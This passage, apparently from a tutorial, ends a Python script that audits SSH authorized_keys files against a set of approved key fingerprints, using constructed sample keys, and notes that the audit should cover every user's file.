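            key_type, blob, _comment = split_entry(line)
            fp = fingerprint(key_type, blob)
        except (ValueError, binascii.Error) as exc:
            findings.append((line_no, "malformed", "", str(exc)))
            continue
        status = "approved" if fp in approved else "unapproved"
        findings.append((line_no, status, key_type, fp))
    return findings

def _blob(key_type, body):
    """Build a syntactically valid blob from constructed bytes (not a real key)."""
    name = key_type.encode()
    return base64.b64encode(len(name).to_bytes(4, "big") + name + body).decode()

# Constructed sample: two approved keys, one appended key, one broken line.
ADMIN = _blob("ssh-ed25519", (32).to_bytes(4, "big") + b"A" * 32)
BACKUP = _blob("ssh-ed25519", (32).to_bytes(4, "big") + b"B" * 32)
ADDED = _blob("ssh-rsa", b"C" * 64)
SAMPLE = "\n".join([
    "# constructed authorized_keys content",
    f"ssh-ed25519 {ADMIN} admin@workstation",
    f'from="10.0.0.0/8",command="echo ssh-rsa" ssh-ed25519 {BACKUP} backup job',
    f"ssh-rsa {ADDED}",
    "ssh-rsa not-base64!! broken",
])
APPROVED = {fingerprint("ssh-ed25519", ADMIN), fingerprint("ssh-ed25519", BACKUP)}

if __name__ == "__main__":
    for finding in audit(SAMPLE, APPROVED):
        print(*finding)
```

In practice the approved set would come from configuration management, and the audit would cover every user's authorized_keys file, since the module's USERNAME option defaults to all users on the box.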